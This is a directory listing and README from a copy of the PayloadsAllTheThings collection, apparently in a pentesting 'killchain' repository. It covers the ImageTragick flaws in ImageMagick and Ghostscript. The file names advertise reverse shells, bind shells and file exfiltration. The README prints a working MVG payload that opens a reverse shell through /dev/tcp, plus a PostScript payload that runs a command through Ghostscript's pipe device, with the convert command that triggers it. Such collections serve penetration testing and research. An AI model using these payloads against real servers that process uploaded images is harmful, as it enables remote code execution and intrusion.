killchain-compendium/misc/PayloadsAllTheThings/Upload Insecure Files/Picture Image Magik
Stefan Friese 4427517c17 bump 2022-05-31 21:08:28 +02:00
..
README.md bump 2022-05-31 21:08:28 +02:00
convert_local_etc_passwd.svg bump 2022-05-31 21:08:28 +02:00
convert_local_etc_passwd_html.svg bump 2022-05-31 21:08:28 +02:00
ghostscript_rce_curl.jpg bump 2022-05-31 21:08:28 +02:00
imagemagik_ghostscript_cmd_exec.pdf bump 2022-05-31 21:08:28 +02:00
imagemagik_ghostscript_reverse_shell.jpg bump 2022-05-31 21:08:28 +02:00
imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg bump 2022-05-31 21:08:28 +02:00
imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg bump 2022-05-31 21:08:28 +02:00
imagetragik1_payload_imageover_reverse_shell_devtcp.jpg bump 2022-05-31 21:08:28 +02:00
imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png bump 2022-05-31 21:08:28 +02:00
imagetragik1_payload_imageover_wget.gif bump 2022-05-31 21:08:28 +02:00
imagetragik1_payload_url_bind_shell_nc.mvg bump 2022-05-31 21:08:28 +02:00
imagetragik1_payload_url_curl.png bump 2022-05-31 21:08:28 +02:00
imagetragik1_payload_url_portscan.jpg bump 2022-05-31 21:08:28 +02:00
imagetragik1_payload_url_remote_connection.mvg bump 2022-05-31 21:08:28 +02:00
imagetragik1_payload_url_reverse_shell_bash.mvg bump 2022-05-31 21:08:28 +02:00
imagetragik1_payload_url_touch.jpg bump 2022-05-31 21:08:28 +02:00
imagetragik1_payload_xml_reverse_shell_nctraditional.xml bump 2022-05-31 21:08:28 +02:00
imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml bump 2022-05-31 21:08:28 +02:00
imagetragik2_burpcollaborator_passwd.jpg bump 2022-05-31 21:08:28 +02:00
imagetragik2_centos_id.jpg bump 2022-05-31 21:08:28 +02:00
imagetragik2_ubuntu_id.jpg bump 2022-05-31 21:08:28 +02:00
imagetragik2_ubuntu_shell.jpg bump 2022-05-31 21:08:28 +02:00
imagetragik2_ubuntu_shell2.jpg bump 2022-05-31 21:08:28 +02:00

README.md

Image Tragik 1 & 2

Exploit v1

Simple reverse shell

push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context

Exploit v2

Simple id payload

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

then use convert shellexec.jpeg whatever.gif

Thanks to